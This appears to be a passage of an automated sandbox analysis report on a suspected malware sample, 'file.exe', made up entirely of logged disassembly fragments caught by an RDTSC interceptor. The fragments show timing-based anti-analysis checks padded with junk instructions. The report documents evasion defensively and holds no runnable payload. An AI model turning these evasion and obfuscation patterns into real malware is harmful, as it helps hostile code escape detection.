                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3411 second address: 7A3435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jg 00007F6C698AAEEAh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 jno 00007F6C698AAEE6h 0x00000018 jmp 00007F6C698AAEEAh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3592 second address: 7A3597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3597 second address: 7A35A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A36D1 second address: 7A36D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A36D7 second address: 7A36F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C698AAEF6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A36F7 second address: 7A36FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A36FB second address: 7A36FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A36FF second address: 7A3705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3845 second address: 7A3855 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F6C698AAEE6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3855 second address: 7A3859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7768 second address: 7A7787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F6C698AAEF3h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7787 second address: 7A779C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnp 00007F6C6956DA50h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A779C second address: 7A77D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jbe 00007F6C698AAEEAh 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jne 00007F6C698AAEF2h 0x0000001b pop eax 0x0000001c clc 0x0000001d lea ebx, dword ptr [ebp+124494FEh] 0x00000023 cld 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 jc 00007F6C698AAEE6h 0x0000002e pop eax 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77D7 second address: 7A77E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C6956DA48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77E9 second address: 7A77EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77EF second address: 7A77F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77F4 second address: 7A77FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A77FA second address: 7A77FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7831 second address: 7A7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7835 second address: 7A787C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, 2352h 0x00000011 push 00000000h 0x00000013 mov dx, si 0x00000016 call 00007F6C6956DA49h 0x0000001b jmp 00007F6C6956DA4Fh 0x00000020 push eax 0x00000021 push eax 0x00000022 push esi 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop esi 0x00000026 pop eax 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b pushad 0x0000002c jnl 00007F6C6956DA4Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A787C second address: 7A789D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF1h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnp 00007F6C698AAEEEh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A789D second address: 7A78BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6C6956DA54h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A78BC second address: 7A7919 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C698AAEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jno 00007F6C698AAEF0h 0x00000011 push 00000003h 0x00000013 mov ecx, 26A2EADAh 0x00000018 push 00000000h 0x0000001a mov ecx, dword ptr [ebp+122D36BFh] 0x00000020 mov edi, dword ptr [ebp+122D38F7h] 0x00000026 push 00000003h 0x00000028 mov dx, 0F13h 0x0000002c push 8919C29Bh 0x00000031 pushad 0x00000032 jmp 00007F6C698AAEF6h 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7A87 second address: 7A7A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7A8C second address: 7A7B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C698AAEE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jbe 00007F6C698AAEF9h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F6C698AAEEFh 0x0000001f popad 0x00000020 pop eax 0x00000021 add ecx, dword ptr [ebp+122D385Fh] 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F6C698AAEE8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 sub dx, E65Ah 0x00000048 push 00000000h 0x0000004a pushad 0x0000004b je 00007F6C698AAEECh 0x00000051 jns 00007F6C698AAEE6h 0x00000057 je 00007F6C698AAEE8h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 push 00000003h 0x00000062 call 00007F6C698AAEEEh 0x00000067 sub si, D795h 0x0000006c pop esi 0x0000006d call 00007F6C698AAEE9h 0x00000072 jmp 00007F6C698AAEF9h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push edx 0x0000007b jmp 00007F6C698AAEF0h 0x00000080 pop edx 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7B4D second address: 7A7B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007F6C6956DA4Bh 0x00000013 push eax 0x00000014 jmp 00007F6C6956DA4Ch 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e jl 00007F6C6956DA4Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B849D second address: 7B84A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C77FD second address: 7C780F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F6C6956DA46h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C579B second address: 7C57A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5949 second address: 7C5953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C6956DA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5953 second address: 7C5985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6C698AAEF9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5985 second address: 7C598A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C598A second address: 7C5997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F6C698AAEF2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5BF6 second address: 7C5BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5BFB second address: 7C5C06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5C06 second address: 7C5C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5D4D second address: 7C5D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F6C698AAEE6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F6C698AAEE6h 0x00000016 jnl 00007F6C698AAEE6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C61BD second address: 7C61D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6C6956DA4Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6314 second address: 7C631D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6460 second address: 7C6472 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6C6956DA4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C65F1 second address: 7C6612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6612 second address: 7C6617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6A25 second address: 7C6A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7116 second address: 7C711A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C711A second address: 7C7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007F6C698AAEE6h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C73AC second address: 7C73B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDD48 second address: 7CDD4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDD4E second address: 7CDD61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F6C6956DA48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCCC2 second address: 7CCCCC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCCCC second address: 7CCCE5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C6956DA48h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6C6956DA4Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE595 second address: 7CE59B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE59B second address: 7CE59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE59F second address: 7CE5B4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B31 second address: 7D1B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jnc 00007F6C6956DA46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B3F second address: 7D1B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B44 second address: 7D1B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B4C second address: 7D1B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1B50 second address: 7D1B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA50h 0x00000007 jmp 00007F6C6956DA50h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6C6956DA51h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E64 second address: 7D1E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F6C698AAEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E70 second address: 7D1E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D574B second address: 7D574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D574F second address: 7D5755 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5755 second address: 7D5772 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C698AAEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F6C698AAEE8h 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D65C4 second address: 7D65C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D687D second address: 7D6883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6883 second address: 7D68AD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C6956DA5Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F6C6956DA46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D68AD second address: 7D68B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D68B3 second address: 7D68BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6C6956DA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D69A9 second address: 7D69AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7762 second address: 7D7766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D990E second address: 7D9914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAFBB second address: 7DAFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6C6956DA4Eh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C69E second address: 78C6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C6A4 second address: 78C6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB610 second address: 7DB616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC230 second address: 7DC29E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F6C6956DA48h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call 00007F6C6956DA4Bh 0x0000002a pop esi 0x0000002b push 00000000h 0x0000002d or dword ptr [ebp+122D1987h], edx 0x00000033 push 00000000h 0x00000035 mov si, cx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jbe 00007F6C6956DA46h 0x00000042 jmp 00007F6C6956DA4Bh 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBFD6 second address: 7DBFE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0CE second address: 7DE0D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB28 second address: 7DEB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DDEE6 second address: 7DDEFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C6956DA4Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB44 second address: 7DEB49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB49 second address: 7DEB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jg 00007F6C6956DA46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB5B second address: 7DEB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEB65 second address: 7DEBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push edi 0x00000008 mov dword ptr [ebp+122D2175h], ebx 0x0000000e pop esi 0x0000000f mov dword ptr [ebp+122D2175h], esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F6C6956DA48h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F6C6956DA48h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d call 00007F6C6956DA53h 0x00000052 mov dword ptr [ebp+122D2671h], edx 0x00000058 pop esi 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b jmp 00007F6C6956DA51h 0x00000060 pushad 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
